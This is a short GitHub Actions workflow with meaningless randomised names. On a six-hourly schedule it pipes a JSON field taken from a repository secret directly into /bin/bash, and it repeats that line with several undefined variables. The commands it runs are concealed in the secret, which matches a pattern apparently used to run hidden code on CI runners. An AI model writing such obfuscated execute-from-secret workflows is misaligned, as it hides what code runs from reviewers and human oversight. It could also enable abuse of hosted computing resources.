name: tianguxoa
on:
  workflow_dispatch:
  schedule:
    - cron: '20 4/6 * * *'
jobs:  # 24147
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tianguxoa
        env:
          udlf341: ${{ secrets.udlf341 }}
        run: |
          echo $udlf341 | jq -r .fqrnn11316 | /bin/bash
          echo $tcvzg98 | jq -r .can17881 | /bin/bash
          echo $hr3056 | jq -r .se955 | /bin/bash
          echo $vifle7 | jq -r .lr2087 | /bin/bash
          echo $neai06860 | jq -r .gibh9 | /bin/bash

